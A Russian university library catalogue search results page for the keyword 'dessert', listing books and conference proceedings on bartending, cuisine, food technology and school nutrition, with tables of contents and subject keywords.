Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

73 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ДЕСЕРТ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 39
1. 
Иванникова Е. И. Барное дело [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2004. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- БАР - МАРКЕТИНГ -- бар - реклама -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- боули -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
2. 
Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2006. - 191 с.
Держатели документа (Информация об экземплярах) 
3. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
4. 
Хворостухина С. А. Секреты японской кухни [Текст] : закуски, соусы, супы, десерты, напитки / С. А. Хворостухина, 2004. - 239 с., [8] л. ил. с.
Держатели документа (Информация об экземплярах) 
5. 
Кулинарные зарисовки о здоровом питании [Текст] : сборник / авт.-сост.: Г. В. Иванова, Л. Г. Макарова, И. Н. Пушмина и др., 2007. - 567 с.
Держатели документа (Информация об экземплярах) 
6. 
Инновационная экономика и образование: особенности, достижения, перспективы. В 2 т. Т. 2. Инновации в научно-педагогической деятельности вуза: современное состояние, проблемы, перспективы развития [Текст] : сб. материалов IV Междунар. науч.-практ. конф. / М-во образования Омской обл., М-во экономики Омской обл., Ассоциация негосударственных вузов России [и др.], 2007. - 314 с.
Оглавление 
  • Мавляков, А. С. Образование в США / А. С. Мавляков. - с.7-14
    Кл. слова: США - ОБРАЗОВАНИЕ
  • Клочков, В. П. Проблема наглядности в инновационном обучении / В. П. Клочков. - с.15-41
  • Барановский, А. И. Инновационный подход к организации профессиональной подготовки специалистов в Омском экономическом институте / А. И. Барановский. - с.42-47
    Кл. слова: ИННОВАЦИИ - ОБРАЗОВАНИЕ
  • Анацкая, А. Г. Использование инновационных методов при формировании информационной культуры учащихся / А. Г. Анацкая. - с.48-51
    Кл. слова: КУЛЬТУРА ИНФОРМАЦИОННАЯ
  • Боотаева, Б. Л. Глобализация и проблемы модернизации высшего образования в Кыргызской республике / Б. Л. Боотаева. - с.52-58
  • Бтикеева, М. А. О необходимости изучения римского частного права и его значении в профессиональной подготовке будущих юристов / М. А. Бтикеева. - с.59-62
  • Вальян, Н. С. Проблемные задания по математике как средство развития познавательных мотивов обучающихся / Н. С. Вальян. - с.63-68
  • Вольвач, В. Г. Система отношений в инновационной организации как процесс согласования интересов / В. Г. Вольвач. - с.69-78
  • Гаас, Т. Н. Корпоративная культура как фактор инновационной активности / Т. Н. Гаас. - с.79-84
    Кл. слова: КУЛЬТУРА КОРПОРАТИВНАЯ
  • Галич, Ю. Г. Сравнительный анализ результатов тестирования по математике / Ю. Г. Галич. - с.85-90
  • Герасимова, Н. О. Применение модульно-рейтинговой оценки знаний как инновационного метода обучения / Н. О. Герасимова, Ю. Н. Югатова. - с.91-103
  • Даровских, В. Д. Мониторинг и структурная формализация системы образования / В. Д. Даровских. - с.104-118
  • Донченко, Н. А. Принципы эвристического обучения / Н. А. Донченко. - с.119-133
    Кл. слова: ОБУЧЕНИЕ ЭВРИСТИЧЕСКОЕ
  • Залепо, В. М. Подготовка специалистов в вузах и рынок труда в Казахстане / В. М. Залепо, Б. М. Беккулиева. - с.134-142
    Кл. слова: КАЗАХСТАН - РЫНОК ТРУДА
  • Карасаева, Х. О. Качество как критерий интеграции казахской системы образования в мировое образовательное пространство / Х. О. Карасаева. - с.143-147
  • Кислицына, Т. Ф. Формирование системы менеджмента качества в вузе как инновационное направление в управлении качеством образования / Т. Ф. Кислицына, С. В. Шеремета. - с.148-156
    Кл. слова: МЕНЕДЖМЕНТ КАЧЕСТВА ОБРАЗОВА
  • Кольга, В. В. Интеграционная модель образовательных учреждений в системе непрерывного аэрокосмического образования / В. В. Кольга. - с.157-160
  • Кох, К. Академические реформы и Болонский процесс в Германии / К. Кох. - с.161-167
  • Кротова, И. В. Возможности формализации совместимости наглядности учебной литературы / И. В. Кротова. - с.168-183
  • Кудинова, Н. С. Экопсихологический подход как основа формирования и развития творческого потенциала личности специалиста / Н. С. Кудинова, О. Ю. Мельникова. - с.184-187
  • Кузнецова, Л. Г. Информационные технологии в повышении качества образования / Л. Г. Кузнецова. - с.188-192
    Кл. слова: ТЕХНОЛОГИИ ИНФОРМАЦИОННЫЕ
  • Кузнецова, М. Н. Национальная экономика как инновация в системе подготовки будущих экономистов / М. Н. Кузнецова. - с.193-205
    Кл. слова: ЭКОНОМИКА НАЦИОНАЛЬНАЯ
  • Макшеев, А. А. Медико-биологические аспекты создания кисломолочного десертного продукта для функционального питания / А. А. Макшеев, С. И. Артюхова. - с.206-211
    Кл. слова: ДЕСЕРТ КИСЛОМОЛОЧНЫЙ
  • Манюкова, Н. Н. Воспитание учащихся на уроке иностранного языка посредством ролевой игры или дискуссии / Н. Н. Манюкова. - с.212-217
  • Манюкова, Н. Н. Формирование экологических знаний на уроках французского языка / Н. Н. Манюкова. - с.218-225
  • Настащук, Н. А. Когнитивная графика интеллектуальных информационных технологий в развитии интуитивного уровня системного мышления у студентов экономического профиля / Н. А. Настащук. - с.226-229
  • Окишев, С. В. Применение инновационных методических приемов при организации компьютерных занятий по численным методам / С. В. Окишев. - с.230-236
  • Петрова, С. А. К проблеме совершенствования научно-исследовательской деятельности студентов в вузах / С. А. Петрова. - с.237-243
  • Погребняк, А. И. Организация экологического мониторинга как показатель совершенствования экологического просвещения, образования и воспитания студентов в Омском экономическом институте / А. И. Погребняк. - с.244-250
  • Полоцкая, Т. Ю. Дистанционное обучение в вузе / Т. Ю. Полоцкая. - с.251-254
    Кл. слова: ОБУЧЕНИЕ ДИСТАНЦИОННОЕ
  • Понкратов, В. Н. Оценка текущих результатов при занятиях физической культурой / В. Н. Понкратов, Л. В. Крылова. - с.255-263
    Кл. слова: КУЛЬТУРА ФИЗИЧЕСКАЯ
  • Салохина, Т. А. Современный подход к обучению переводу текста по специальности в неязыковом вузе / Т. А. Салохина. - с.264-268
  • Скоробагатько, М. А. Некоторые аспекты инновационного развития российского вуза / ; М. А. Скоробогатько. - с.269-279
  • Тишина, Т. Н. Активизация инновационной деятельности студентов как одна из форм развития личности / Т. Н. Тишина. - с.280-284
  • Трубицина, С. П. Организация деятельности преподавателя и студентов в процессе внедрения инновационных методов обучения / С. П. Трубицина. - с.285-295
  • Тютерева, И. В. Использование интерактивных технологий на занятиях по иностранному языку при подготовке будущих экономистов / И. В. Тютерева. - с.296-300
  • Шеремета, С. В. Новые направления формирования кредитной политики вуза / С. В. Шеремета, С. И. Ускова. - с.301-304
    Кл. слова: ПОЛИТИКА КРЕДИТНАЯ ВУЗА
  • Эгембердиев, Ш. Э. Личностное развитие студента - неотъемлемая часть профессиональной подготовки / Ш. Э. Эгембердиев. - с.305-311
Держатели документа (Информация об экземплярах) 
7. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 2 [Текст] / ред. А. И. Барановский, 2012. - 187 с.
Ключевые слова 
Оглавление 
  • Заблицева, М. А. Характеристика овощного сырья, используемого в производстве йогуртов / М. А. Заблицева, И. А. Долматова. - с.4-8
    Кл. слова: ЙОГУРТ
  • Завгородняя, Л. М. Разработка и оптимизация рецептуры молочного десерта для школьного питания / Л. М. Завгородняя. - с.8-9
    Кл. слова: ДЕСЕРТ МОЛОЧНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Загидуллин, Д. З. Влияние материала оборудования на окисление аскорбиновой кислоты / Д. З. Загидуллин, В. Ю. Кирсанов, Ф. Ф. Фазлыев. - с.9-12
    Кл. слова: ОКИСЛЕНИЕ, КИСЛОТА АСКОРБИНОВАЯ
  • Иванова, Л. П. Спорт и здоровье: функциональный продукты специального назначения / Л. П. Иванова, Л. В. Егорова, С. В. Чехунов. - с.13-18
    Кл. слова: СПОРТ - ЗДОРОВЬЕ
  • Ивкова, И. Д. Использование растительных жиров в современных пищевых производствах / И. Д. Ивкова, А. С. Пиляева. - с.18-21
    Кл. слова: ПРОИЗВОДСТВО ПИЩЕВОЕ, ЖИР РАСТИТЕЛЬНЫЙ
  • Ивченко, В. В. Сравнительная характеристика качества кофе натурального растворимого разных производителей / В. В. Ивченко, О. В. Бессонова. - с.22-24
    Кл. слова: КОФЕ
  • Калауденова, А. Т. Изучение потребительских предпочтений и экспертиза качества оливкого масла / А. Т. Калауденова. - с.25-32
    Кл. слова: МАСЛО ОЛИВКОВОЕ
  • Кирсанов, В. Ю. Изучение влияния УФ-излучения на микрофлору предприятий общественного питания на примере дрожжей SACCHAROMYCES CEREVISIAE / В. Ю. Кирсанов, С. Е. Шаталов, Д. З. Загидуллин. - с.32-34
    Кл. слова: УФ - ИЗЛУЧЕНИЯ, МИКРОФЛОРА, ДРОЖЖИ
  • Ковальчук, О. Г. Соблюдение водного режима в марафонском беге / О. Г. Ковальчук, П. А. Скрипников. - с.34-38
    Кл. слова: БЕГ МАРАФОНСКИЙ, РЕЖИМ ПИТЬЕВОЙ, ПИТЬЁ СПОРТИВНОЕ
  • Колчина, В. А. Обогащение творога фруктовыми наполнителями / В. А. Колчина, И. А. Долматова, Т. Н. Зайцева. - с.38-42
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, ТВОРОГ
  • Кольман, О. Я. Инновационные технологии производства мучных кондитерских изделий, обогащенных ягодным порошком / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.42-45
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Кольман, О. Я. Современные индустриальные технологии в производстве кондитерских изделий на ягодной основе / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.46-49
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Корнева, О. С. Статистический анализ стабильности производства пива / О. С. Корнева. - с.49-53
    Кл. слова: ПИВО - ПРОИЗВОДСТВО
  • Корнева, О. С. Управление качеством пива на стадии формирования рынка / О. С. Корнева. - с.54-57
    Кл. слова: ПИВО
  • Коротаева, Т. А. Возможность использования фиников в производстве мучных кондитерских изделий / Т. А. Коротаева. - с.57-58
    Кл. слова: ФИНИКИ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Костюченко, Н. В. Влияние электромагнитной обработки на микроорганизмы / Н. В. Костюченко. - с.59-61
    Кл. слова: ОБРАБОТКА ЭЛЕКТРОМАГНИТНАЯ, МИКРООРГАНИЗМЫ
  • Костенко, Л. Н. Исследование качества чая черного байхового различных производителей / Л. Н. Костенко, О. В. Бессонова. - с.62-64
    Кл. слова: ЧАЙ
  • Кошкин, П. Ю. Перспективы использования пенообразных масс в молочной промышленности / П. Ю. Кошкин. - с.64-67
    Кл. слова: МАССА ПЕНООБРАЗНАЯ, ПРОМЫШЛЕННОСТЬ МОЛОЧНАЯ
  • Крылова, Л. В. Рекомендации в питании спортсменам-любителям / Л. В. Крылова, В. Н. Понкратов. - с.67-70
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Методика оценки сбалансированности белкового состава многокомпонентных продуктов для школьного питания / ; П. А. Лисин, [и др.]. - с.70-77
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Проектирование поликомпонентных пищевых продуктов с заданным составом и свойствами / ; П. А. Лисин, [и др.]. - с.77-85
    Кл. слова: ПРОДУКТЫ ПИЩЕВЫЕ ПОЛИКОМПОНЕНТНЫЕ
  • Локотченко, Н. С. Проблемы и перспективы разработки низколактозных молочных коктейлей и пенообразующими свойствами / Н. С. Локотченко. - с.85-88
    Кл. слова: КОКТЕЙЛЬ МОЛОЧНЫЙ
  • Лопатинская, Т. В. Продукты питания функционального назначения для детей дошкольного возраста / Т. В. Лопатинская, Д. А. Чистякова, О. Я. Соколова. - с.89-92
    Кл. слова: ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лузан, В. Н. Проектирование продукта на основе рыбного сырья нутриентно-адекватного питанию детей дошкольного возраста / В. Н. Лузан, Л. А. Ключникова, Б. Ш. Цыренжапов. - с.92-99
    Кл. слова: РЫБА - ПИТАНИЕ, ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лукьянюк, Н. В. Современные индустриальные технологии пищевых продуктов / Н. В. Лукьянюк. - с.99-102
    Кл. слова: ЧАЙ
  • Малкова, Н. К. Расширение ассортимента мучных кондитерских изделий повышенной пищевой ценности для сетевого питания / Н. К. Малкова, Л. Г. Ермош. - с.102-105
    Кл. слова: АССОРТИМЕНТ КОНДИТЕРСКИХ ИЗДЕЛИЙ
  • Мусифуллина, Э. В. Яблочные чипсы сублимационной сушки / Э. В. Мусифуллина, Н. В. Макарова, А. Н. Дмитриева. - с.105-109
    Кл. слова: ЧИПСЫ ЯБЛОЧНЫЕ, СУШКА СУБЛИМАЦИОННАЯ
  • Никифорова, Л. М. Заменители мяса, используемые для получения новых видов мясных продуктов / Л. М. Никифорова, О. В. Бессонова. - с.109-112
    Кл. слова: ЗАМЕНИТЕЛЬ МЯСА
  • Паленков, И. А. Разработка системы управления безопасностью и качеством слабоалкогольной газированной продукции / И. А. Паленков, О. В. Пасько. - с.112-120
    Кл. слова: АЛКОГОЛЬ, ПРОДУКЦИЯ СЛАБОАЛЬКОГОЛЬНАЯ
  • Петрова, Е. И. Перспектива расширения ассортимента молочных продуктов для питания спортсменов / Е. И. Петрова. - с.121-124
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Портнягина, В. А. Производство функциональных продуктов для геродиетического питания / В. А. Портнягина. - с.124-126
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Пушмина, И. Н. Формирование подходов к разработке функциональных молокосодержащих продуктов с использованием природных цеолитов / И. Н. Пушмина, А. В. Бауэр. - с.127-128
    Кл. слова: ЦЕОЛИТ ПРИРОДНЫЙ, ПРОДУКЦИЯ МОЛОКОСОДЕРЖАЩАЯ
  • Романишина, Е. Р. Исследование показателей качества и безопасности мясосодержаших полуфабрикатов / Е. Р. Романишина. - с.129-134
    Кл. слова: ПОЛУФАБРИКАТЫ МЯСНЫЕ
  • Савинцева, Ю. О. Современные индустриальные технологии пищевых продуктов на ОАО "Омская макаронная фабрика" / Ю. О. Савинцева. - с.134-141
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, ФАБРИКА МАКАРОННАЯ
  • Сапожников, А. Н. Влияние обработки пшеничной муки энергией инфракрасного излучения на сохраняемость хлеба / А. Н. Сапожников, Л. П. Шорникова, С. К. Волончук. - с.141-145
    Кл. слова: МУКА ПШЕНИЧНАЯ, ХЛЕБ
  • Смирнова, Н. А. Разработка стандарта организации "Биопродукт творожный" / Н. А. Смирнова. - с.146-149
    Кл. слова: БИОПРОДУКТ ТВОРОЖНЫЙ
  • Струпан, Е. А. Технология продуктов переработки дикорастущего сырья / Е. А. Струпан, В. С. Колодязная, О. А. Струпан. - с.149-155
    Кл. слова: СЫРЬЕ ДИКОРАСТУЩЕЕ
  • Трофимов, И. Е. Продукты на основе натурального – основа питания спортсмена / И. Е. Трофимов. - с.156-157
    Кл. слова: СЫРЬЕ НАТУРАЛЬНОЕ, ПИТАНИЕ СПОРТСМЕНОВ
  • Троценко, В. В. Повреждение семян зерновых культур при послеуборочной обработке / В. В. Троценко, А. И. Забудский. - с.158-162
    Кл. слова: ЗЕРНО, ГРЕЧИХА
  • Турлубаева, А. Н. Экология и пища / А. Н. Турлубаева, О. Я. Соколова. - с.162-165
    Кл. слова: ПИЩА - ЭКОЛОГИЯ
  • Унжакова, К. С. Медико-биологические аспекты создания продукции геродиетического питания / К. С. Унжакова, М. В. Исаева, О. Я. Соколова. - с.165-168
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Четвертаков, А. А. Расширение ассортимента продукции за счет использования нетрадиционных видов йодосодержащего растительного сырья / А. А. Четвертаков, Г. В. Иванова, С. В. Чехунов. - с.168-171
    Кл. слова: СЫРЬЕ РАСТИТЕЛЬНОЕ ЙОДОСОДЕРЖАЩЕЕ, АССОРТИМЕНТ ПРОДУКЦИИ
  • Чехомова, Е. А. Товароведная оценка сладко-сливочного масла "Крестьянское" / Е. А. Чехомова, И. А. Ивкова. - с.172-174
    Кл. слова: МАСЛО КОРОВЬЕ
  • Щербина, М. О. Сравнительная характеристика качества варенья различных производителей / М. О. Щербина, Е. П. Галкова. - с.175-177
    Кл. слова: ВАРЕНЬЕ
  • Ходырева, Е. И. Проблемы формирования кластеров общественного питания / Е. И. Ходырева. - с.178-184
    Кл. слова: КЛАСТЕР, ПИТАНИЕ ОБЩЕСТВЕННОЕ
Держатели документа (Информация об экземплярах) 
8. 
Социально-экономические и правовые проблемы развития информационного общества [Текст] : материалы междунар. научно-практ. конф., 30 сент. 2009 г. В 5 т. Т. 5. Проблемы экологии и развития индустрии питания в современном обществе / М-во образования Омской обл., Администрация г. Омска, Региональное объединение работодателей Омской обл., Карагандинский ун-т "Болашак" (Республика Казахстан), Бишкекская финансово-экон. акад. (Кыргызская Республика), Сиб. ин-т бизнеса, управления и психологии, г. Красноярск, Омский экон. ин-т, 2009. - 150 с.
Ключевые слова 
Оглавление 
  • Беспалова, Т. А. Влияние биологически активных веществ на иммунный статус норок при алеутской болезни и иммуннодефицитных состояниях / Т. А. Беспалова, Е. А. Хитрова, О. А. Приступа. - с.7-15
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ, БОЛЕЗНЬ алеутская, ИММУНИТЕТ
  • Богачева, А. А. Здоровое питание подростков в условиях Крайнего Севера / А. А. Богачева, А. И. Турова. - с.15-18
    Кл. слова: ПИТАНИЕ ПОДРОСТКОВ, ПИТАНИЕ ЗДОРОВОЕ
  • Бураковская, Н. В. Актуальные вопросы производства плавленых сырков / Н. В. Бураковская. - с.18-21
    Кл. слова: СЫР ПЛАВЛЕНЫЙ, ПРОИЗВОДСТВО сыра
  • Вальтер, Г. Ф. Технология приготовления творога на основе подсгущеного молока / Г. Ф. Вальтер, П. А. Лисин. - с.21-23
    Кл. слова: ТВОРОГ, ДЕСЕРТ творожный, ПРОИЗВОДСТВО творога
  • Германская, Л. Г. Товароведческая оценка сырного продукта / Л. Г. Германская. - с.23-27
    Кл. слова: СЫР, КАЧЕСТВО сыра
  • Гришина, Е. С. Разработка и оптимизация рецептуры кисломолочного продукта с растительным наполнителем / Е. С. Гришина. - с.27-32
    Кл. слова: ПРОДУКТ КИСЛОМОЛОЧНЫЙ, НАПОЛНИТЕЛЬ растительный
  • Должанкин, В. С. Выбор способов очистки отработанных нефтепродуктов, применяемых в дорожно-строительной технике / В. С. Должанкин. - с.33-41
    Кл. слова: НЕФТЕПРОДУКТЫ, СЫРЬЕ ВТОРИЧНОЕ
  • Жигалкина, Т. С. Проблемы школьного питания учащихся / Т. С. Жигалкина. - с.42-46
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Жидкова, О. Н. Пищевые волокна в производстве молочных продуктов / О. Н. Жидкова. - с.46-50
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Завгородняя, Л. М. Йодированные молочные белки / Л. М. Завгородняя. - с.51-62
    Кл. слова: БЕЛОК - ПИТАНИЕ, ПРОДУКТЫ ЙОДИРОВАННЫЕ, ЙОД - ПИТАНИЕ
  • Изосимова, И. В. Влияние выжимок ягод на гидролитические изменения в мясорастительных паштетах / И. В. Изосимова, О. М. Сергачева, А. М. Тимофеева. - с.62-65
    Кл. слова: ПАШТЕТ, ВЫЖИМКА ягодная
  • Каня, И. П. Некоторые сведения о «Herbalife» / И. П. Каня. - с.65-70
    Кл. слова: Herbalife
  • Кащеева, Н. Л. Перспективы использования белково-углеродного сырья в производстве функциональных продуктов / Н. Л. Кащеева. - с.71--72
    Кл. слова: СЫРЬЕ белково-углеводное, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Королев, А. Н. Качество растениеводческой продукции в условиях техногенного дисбаланса химического состава почвы / А. Н. Королев. - с.73-78
    Кл. слова: БИОХИМИЯ
  • Королев, А. Н. Прогнозирование использования осадков сточных вод в растениеводческих хозяйствах с целью получения экологически безопасных продуктов / А. Н. Королев. - с.78-83
    Кл. слова: ПОЧВА - ЭКОЛОГИЯ, ПРОДУКТЫ ЭКОЛОГИЧЕСКИ ЧИСТЫЕ
  • Лапшинская, Н. А. Влияние молочной сыворотки на качество и безопасность низкокалорийных майонезов / Н. А. Лапшинская, Н. А. Драгун, М. М. Щукина. - с.83-89
    Кл. слова: СЫВОРОТКА молочная, МАЙОНЕЗ
  • Макарова, О. В. Разработка и исследование молочно-растительных систем / О. В. Макарова, О. В. Пасько. - с.89-92
    Кл. слова: ПРОДУКТЫ МОЛОЧНЫЕ, ИССЛЕДОВАНИЕ молочно-растительных систем
  • Мартемьянова, Л. Е. Термодинамический индекс термостабильности пищевых продуктов / Л. Е. Мартемьянова, П. А. Лисин. - с.92-96
    Кл. слова: ИНДЕКС термодинамический, ТЕРМОСТАБИЛЬНОСТЬ пищевых продуктов
  • Мартемьянова, Л. Е. Оценка активности воды пищевых продуктов / Л. Е. Мартемьянова, Г. Ф. Вальтер, П. А. Лисин. - с.97-101
    Кл. слова: ВОДА - ПИТАНИЕ
  • Маюрникова, Л. А. Формирование рынка продуктов специального назначения / Л. А. Маюрникова, Е. В. Санжаровский, Н. В. Горникова. - с.101-105
    Кл. слова: ПРОДУКТЫ специального назначения, КУЛЬТУРА ПИТАНИЯ
  • Миллер, М. А. Индустрия питания и здоровье населения в современных условиях / М. А. Миллер. - с.105-110
    Кл. слова: ИНДУСТРИЯ ПИТАНИЯ, ПИТАНИЕ - ЗДОРОВЬЕ
  • Молибога, Е. А. Безопасность продовольственного сырья и пищевых продуктов как одна из основных составляющих их качества / Е. А. Молибога. - с.111-114
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Неверов, Е. Н. Применение упаковки при охлаждении диоксидом углерода птицы / Е. Н. Неверов. - с.114-117
    Кл. слова: МЯСО охлажденное, ОХЛАЖДЕНИЕ
  • Никишина, И. Н. Возможности создания сегмента молочных продуктов из козьего молока в индустрии питания России / И. Н. Никишина, С. В. Симоненко, С. Е. Димитриева. - с.117-121
    Кл. слова: МОЛОКО козье
  • Петрова, Л. В. О безопасности и качестве сухого молока в процессе распылительной сушки / Л. В. Петрова, С. В. Петрова. - с.122-123
    Кл. слова: СУШКА распылительная, МОЛОКО сухое
  • Погребняк, А. И. Бизнес ресторанных услуг и проблема питания сибиряков на рубеже XX – XXI вв / А. И. Погребняк. - с.123-133
    Кл. слова: БИЗНЕС РЕСТОРАННЫЙ
  • Приступа, О. А. Ультраструктурная характеристика патологического процесса в центральной нервной системе животных при аутомутиляции / О. А. Приступа, Т. А. Беспалова. - с.134-139
  • Пронович, О. Н. Ценностный аспект глобального экологического кризиса / О. Н. Пронович. - с.140-142
    Кл. слова: КРИЗИС ЭКОЛОГИЧЕСКИЙ
  • Шадрин, М. А. Пищевая комбинаторика как фактор решения проблем при разработке новых технологий продуктов питания / М. А. Шадрин. - с.146-148
    Кл. слова: КОМБИНАТОРИКА
Держатели документа (Информация об экземплярах) 
9. 
Молодежь и наука: проблемы, поиски, решения. Проблемы питания и экологии: перспективы и инновационные пути их решения [Текст] : сб. материалов Междунар. науч.-практ. конф. студентов, аспирантов и докторантов, 23 сент. 2008 г. / АНО ВПО "Омский экономический ин-т", 2008. - 123 с.
Ключевые слова 
Оглавление 
  • Акшулаков, И. Школьное питание / И. Акшулаков. - с.14-15
  • Захарова, Л. В. Ключевые компоненты охраны здоровья школьников / Л. В. Захарова, Т. А. Шубина. - с.16-18
    Кл. слова: ОХРАНА ЗДОРОВЬЯ школьников
  • Каня, И. П. Болезни неправильного питания школьников / И. П. Каня, П. Осипов, Е. Мишина. - с.19-23
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Левочкина, С. М. Мониторинг организации питания учащихся СОШ № 33 / С. М. Левочкина, О. В. Пасько. - с.24-28
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Макарова, О. В. Анализ организации питания школьников различных возрастных групп на примере средней образовательной школы № 47 г. Омска / О. В. Макарова, Ю. В. Батурина. - с.29-33
  • Пасько, О. В. Анализ отношения учащихся СОШ № 116 г. Омска к вопросам здорового питания / О. В. Пасько, Л. Г. Германская, О. В. Макарова. - с.34-37
  • Пасько, О. В. Научные исследования молодых ученых Омского экономического института по оценке состояния и поиску решения проблем школьного питания в регионе / О. В. Пасько. - с.38-43
  • Пасько, О. В. Характеристика и анализ цикличного меню столовой СОШ № 116 / О. В. Пасько, Н. В. Кочеткова, С. Е. Козлова. - с.44-48
  • Пушмина, И. Н. Возможность использования цеолитов для обеспечения гигиенической безопасности молока и молочных продуктов в школьном питании / И. Н. Пушмина, М. А. Донова, С. И. Хорунжина. - с.49-54
    Кл. слова: цеолит
  • Характеристика и аналих организации питания школьников различных возрастных групп на примере лицея № 29 / ; М. А. Шадрин, А. Авагян, Н. Остапик и др.. - с.55-59
  • Шадрин, М. А. Мониторинг проблем школьного питания на примере лицея № 143 / М. А. Шадрин, Р. И. Чупин. - с.60-66
  • Артюхова, С. И. Улучшение структуры питания за счет разработки и производства новых функциональных кисломолочных десертов / С. И. Артюхова, А. А. Макшеев. - с.68-70
    Кл. слова: ДЕСЕРТ КИСЛОМОЛОЧНЫЙ
  • Беспалова, Т. А. Изучение показателей качества полукопченых колбас омских производителей при различных режимах обработки и хранения / Т. А. Беспалова, О. А. Приступа, И. В. Крючкова
    Кл. слова: КОЛБАСА
  • Евсеева, О. П. Информационное обеспечение профессиональной деятельности специалиста садово-паркового строительства / О. П. Евсеева. - с.79-81
  • Ермолаев, В. А. Активность воды в пищевых продуктах / В. А. Ермолаев. - с.82-85
  • Корнеева, Г. И. Сохранение биологичесского разнообразия растений - решение одной из экологических проблем современного общества / Г. И. Корнеева. - с.86-90
  • Леонтьева, В. В. Концептуальные аспекты развития сельских территорий / В. В. Леонтьева. - с.91-98
  • Матвеева, Е. Г. Оценка экологического ущерба природной окружающей среде от снижения загрязнения отходами асбестоцементного производства / Е. Г. Матвеева, Н. П. Лукутцова, Л. М. Шевченко. - с.99-101
  • Морозова, Е. В. Экологические аспекты производства мучных кондитерских изделий / Е. В. Морозова, В. А. Перевозова. - с.102-104
  • Панькив, О. Г. Биологически активные препараты на основе лесосечных отходов / О. Г. Панькив, В. Н. Паршикова, Р. А. Степень. - с.105-109
  • Русских, И. В. Чистец остисточашечковый и прямой; вариации последнего на Кавказе: биология, экология, охрана и рациональное использование / И. В. Русских, С. Б. Криворотов. - с.110-117
  • Тиленова, Д. К. Факторы и процессы формирования химического состава вод рек Южного Кыргыстана (Бассейн р. Сырдарьи) / Д. К. Тиленова. - с.118-121
Держатели документа (Информация об экземплярах) 
10. 
Гаевская Л. Я. Украинская кухня [Текст] : издания для досуга / Л. Я. Гаевская, 2004. - 159 с.
Держатели документа (Информация об экземплярах) 
11. 
Люка А. П. Европейская кухня [Текст] : издания для досуга / А. П. Люка, 2004. - 174 с.
Держатели документа (Информация об экземплярах) 
12. 
